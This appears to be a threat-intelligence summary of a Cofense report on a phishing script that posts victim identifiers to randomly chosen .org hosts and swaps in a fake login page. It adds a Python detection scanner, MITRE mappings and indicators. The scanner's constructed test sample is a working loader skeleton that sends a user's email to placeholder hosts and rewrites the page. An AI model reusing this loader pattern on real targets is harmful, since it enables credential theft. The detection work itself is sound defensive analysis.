Cofense Intelligence discovered a sophisticated phishing script that selects a random .org domain, generates dual UUIDs, and performs server-driven dynamic page replacement to steal credentials while evading detection. This technique leverages HTML-based attachments and cloud-collaboration spoofing to deliver the malicious payload and targets enterprise users with tailored fake login pages. #Cofense #uuidv4
Keypoints
- The phishing script selects a single random .org domain from a hardcoded list for each execution, avoiding failover and reducing detectable network noise.
- The script includes both a hardcoded campaign UUID (6fafd0343-d771-4987-a760-25e5b31b44f) and a dynamically generated session UUID (uuidv4()) to track campaigns and individual victims.
- Delivery vectors observed include HTML-based email attachments and emails with links spoofing cloud collaboration platforms like Microsoft OneDrive, SharePoint Online, DocuSign, Google Docs, and Adobe Sign.
- The script loads legitimate libraries (e.g., jQuery from cdnjs.cloudflare.com) and checks/decodes Base64-encoded strings and validates email addresses to tailor responses.
- The attack uses an HTTPS POST to hxxps://[chosen-domain]/api/v3/auth with JSON payload containing uuid, identifier, server, and user to request a server-generated credential phishing page.
- Instead of redirecting, the script replaces the current page content with attacker-controlled HTML (dynamic page replacement), enabling seamless credential capture and evasion of URL-based detection.
- This tactic minimizes DNS and network indicators, leverages .org perceived legitimacy, and aligns with targeted spearphishing goals where some delivery failures are acceptable for high-volume campaigns.
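The behaviours listed above (a quoted array of .org hostnames picked at random, a hardcoded campaign UUID beside a per-session uuidv4(), Base64 decoding and email validation, an HTTPS POST to /api/v3/auth, and in-place page replacement instead of a redirect) are all visible in the attachment's own source before the browser ever renders it. The following is an added example, not code from Cofense or from the report: a small Python scanner that applies weighted regex rules to an HTML attachment body and returns a triage verdict. The rule weights, the threshold, both sample attachments and the placeholder .org hostnames are constructed for this example; the only value taken from the report is the hardcoded campaign UUID.

```python
"""Static indicator scan for HTML email attachments (added example, not Cofense's code)."""
import re

# Campaign identifier quoted in the report above (kept verbatim as an IoC string).
CAMPAIGN_UUID = "6fafd0343-d771-4987-a760-25e5b31b44f"

# Heuristic rules: (name, pattern, weight). Weights and the threshold are
# assumptions chosen for triage, not values from the report.
RULES = [
    ("campaign_uuid", re.compile(re.escape(CAMPAIGN_UUID)), 5),
    ("auth_api_post", re.compile(r"/api/v3/auth\b"), 4),
    # Two or more quoted *.org strings inside one JS array literal.
    ("org_domain_array", re.compile(r"""\[\s*(?:["'][^"']+\.org["']\s*,?\s*){2,}\]"""), 3),
    # Dynamic page replacement: rewriting the document instead of redirecting.
    ("page_replacement", re.compile(r"document\.(?:open|write)\s*\(|(?:documentElement|body)\.innerHTML\s*="), 3),
    ("session_uuid_generation", re.compile(r"\buuidv4\s*\(|crypto\.randomUUID\s*\("), 2),
    # The four JSON payload keys named in the report, in order.
    ("payload_keys", re.compile(r"\buuid\b.*\bidentifier\b.*\bserver\b.*\buser\b", re.S), 2),
    ("random_array_pick", re.compile(r"Math\.floor\s*\(\s*Math\.random\s*\(\s*\)\s*\*"), 1),
    ("base64_decode", re.compile(r"\batob\s*\("), 1),
    # Matches the literal "[^\s@]+@" of a typical JS email-validation regex.
    ("email_validation", re.compile(r"\[\^\\s@\]\+@"), 1),
    ("cdn_jquery", re.compile(r"cdnjs\.cloudflare\.com/ajax/libs/jquery"), 1),
]
SUSPICIOUS_THRESHOLD = 8  # assumption: generic indicators alone (weight 1) never reach it


def scan_html_attachment(html: str) -> dict:
    """Return matched rule names, a weighted score and a verdict for one HTML body."""
    matched = [name for name, pattern, _ in RULES if pattern.search(html)]
    score = sum(weight for name, _, weight in RULES if name in matched)
    verdict = "suspicious" if score >= SUSPICIOUS_THRESHOLD else "likely-benign"
    return {"matched": matched, "score": score, "verdict": verdict}


# Constructed sample mirroring the loader behaviour described in the report.
# Hostnames are placeholders, not the domains observed in the campaign.
MALICIOUS_SAMPLE = r"""<html><head>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.1/jquery.min.js"></script>
</head><body><script>
var domains = ["placeholder-one.org", "placeholder-two.org", "placeholder-three.org"];
var host = domains[Math.floor(Math.random() * domains.length)];
var campaign = "6fafd0343-d771-4987-a760-25e5b31b44f";
var session = uuidv4();
var user = atob("dXNlckBleGFtcGxlLmNvbQ==");
if (/^[^\s@]+@[^\s@]+\.[^\s@]+$/.test(user)) {
  $.ajax({url: "https://" + host + "/api/v3/auth", type: "POST",
    data: JSON.stringify({uuid: campaign, identifier: session, server: host, user: user}),
    success: function (html) { document.open(); document.write(html); document.close(); }});
}
</script></body></html>"""

# Constructed benign page: also loads jQuery from the CDN and validates an
# email address, which on their own should not trip the threshold.
BENIGN_SAMPLE = r"""<html><head>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.1/jquery.min.js"></script>
</head><body>
<form id="signup"><input name="email"><button>Join</button></form>
<script>
$("#signup").on("submit", function (e) {
  var email = $("input[name=email]").val();
  if (!/^[^\s@]+@[^\s@]+\.[^\s@]+$/.test(email)) { e.preventDefault(); alert("Invalid email"); }
});
</script></body></html>"""


if __name__ == "__main__":
    for label, sample in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, scan_html_attachment(sample))
```

The weighting is the point of the design: a CDN-hosted jQuery, an email regex and an atob() call are ordinary web-page features and are scored low, so the benign form scores 2 and stays below the threshold. What separates the loader is the combination of the /api/v3/auth path, a random pick from a quoted .org array and document.write-style page replacement, which together already exceed the threshold before the campaign UUID is even considered; that keeps the rule useful when the attacker rotates the UUID or the domain list.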
MITRE Techniques
- [T1566.002] Phishing: Spearphishing Link – The campaign uses HTML attachments and links that spoof cloud collaboration platforms to deliver malicious URLs, reducing detection through trusted-looking delivery (“phishing email contains HTML-based attachments… embedded URL that automatically leads to a credential phishing page”).
- [T1185] Browser Session Hijacking – The script replaces the current page content with server-provided phishing pages without redirecting, manipulating the browser session (“changing a webpage’s content with attacker-controlled material, like a fake login page, without changing the web address”).
- [T1078] Valid Accounts (credential harvesting) – The attacker collects user credentials via tailored fake login pages generated by the server after receiving identifying information (“serves as a pivotal step … manipulate the user’s browser session … designed to steal passwords or other sensitive information”).
Indicators of Compromise
- [Domain] Random .org domains used as POST endpoints – examples: hxxps://[chosen-domain]/api/v3/auth (selected from a list of nine .org domains).
- [UUID / Identifier] Hardcoded and dynamic UUIDs in POST payload – example hardcoded: 6fafd0343-d771-4987-a760-25e5b31b44f; dynamic: uuidv4() per session.
- [File type / Delivery] HTML-based email attachments and spoofed cloud links – examples: attachments containing embedded URLs, spoofed platforms include Microsoft OneDrive/SharePoint Online and DocuSign.
- [Library Host] Legitimate CDN usage for script loading – example: cdnjs.cloudflare[.]com (used to load jQuery).
Read more: https://cofense.com/blog/unpacking-the-phishing-script-behind-a-server-orchestrated-deception